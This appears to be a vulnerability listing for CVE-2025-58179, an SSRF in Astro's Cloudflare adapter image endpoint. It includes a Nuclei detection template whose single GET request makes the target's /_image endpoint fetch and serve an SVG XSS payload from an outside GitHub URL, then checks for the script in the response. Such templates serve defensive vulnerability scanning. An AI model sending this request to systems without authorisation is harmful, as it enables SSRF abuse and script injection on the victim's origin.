Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When configured with output: 'server' while using the default imageService: 'compile', the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served. a A bug in impacted versions of the @astrojs/cloudflare adapter for deployment on Cloudflare’s infrastructure, allows an attacker to bypass the third-party domain restrictions and serve any content from the vulnerable origin.
PoC代码[已公开]
id: CVE-2025-58179
info:
name: Astro Cloudflare Adapter - Server Side Request Forgery
author: HoangAnhThai
severity: high
description: |
Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When configured with output: 'server' while using the default imageService: 'compile', the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served. a A bug in impacted versions of the @astrojs/cloudflare adapter for deployment on Cloudflare’s infrastructure, allows an attacker to bypass the third-party domain restrictions and serve any content from the vulnerable origin.
reference:
- https://github.com/withastro/astro/commit/9ecf359
- https://github.com/advisories/GHSA-qpr4-c339-7vq8
- https://nvd.nist.gov/vuln/detail/CVE-2025-58179
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2025-58179
epss-score: 0.02487
epss-percentile: 0.84767
cwe-id: CWE-918
cpe: cpe:2.3:a:withastro:astro:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: withastro
product: astro
tags: cve,cve2025,ssrf,xss,astro,cloudflare
http:
- method: GET
path:
- "{{BaseURL}}/_image?href=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script type="text/javascript'
- 'alert(document.domain);'
condition: and
- type: word
part: content_type
words:
- "image/svg+xml"
- type: status
status:
- 200
# digest: 4b0a004830460221008d36bfbc528feb280ea3d53880106308953f44d431626c00e7c9d2afc99ddf21022100aa53d918507dde0cb6c56a6257fc9002653bd8b2baa2db114696f6050caf2efb:922c64590222798bb761d5b6d8e72950